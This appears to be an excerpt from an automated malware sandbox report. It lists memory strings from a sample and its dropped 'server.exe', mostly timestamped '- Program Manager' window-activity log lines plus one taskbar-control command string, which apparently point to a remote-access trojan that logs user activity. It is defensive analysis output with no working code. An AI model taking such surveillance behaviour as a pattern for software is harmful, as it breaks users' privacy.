Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:10:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:07:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:16:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:23:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:47:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:47:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:43:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:36:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 06:18:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:16:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:33:55 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 13:23:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:34:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:08:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 17:54:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:40:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:46:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 22:02:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 08:02:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:52:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 05:22:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:28:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:52:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:36:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 12:00:16 - Program Manager
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Shell_traywnd+MostrarBarraDeTarefas
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:07:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 04:30:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:41:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:09:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:19:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:35:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:53:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:31:36 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:41:04 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/25 \| 07:57:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:45:44 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:08:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:42:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:31:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 19:39:21 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:09:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 22:56:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 15:08:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:17:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 00:38:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:47:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:12:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 22:38:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:41:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:56:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:52:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 01:40:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:01:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:09:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 06:15:21 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 14:21:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:14:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:12:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:32:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:28:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:07:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 13:30:23 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 19:42:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:00:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 06:42:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 23:09:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 06:56:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 08:22:08 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 08:30:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 00:01:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:31:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 23:06:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 06:31:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 20:37:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:32:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:52:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:52:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:25:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:04:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:05:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 05:52:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 21:25:42 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/09 \| 14:41:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:20:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 18:05:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/27 \| 13:59:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 09:47:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:19:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/20 \| 00:12:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:44:25 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:30:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 05:36:12 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:01:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:28:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:17:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 13:09:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:13:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:24:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:25:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 02:38:27 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 00:47:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:21:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:13:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 23:13:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:19:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/28 \| 00:36:35 - Program Manager
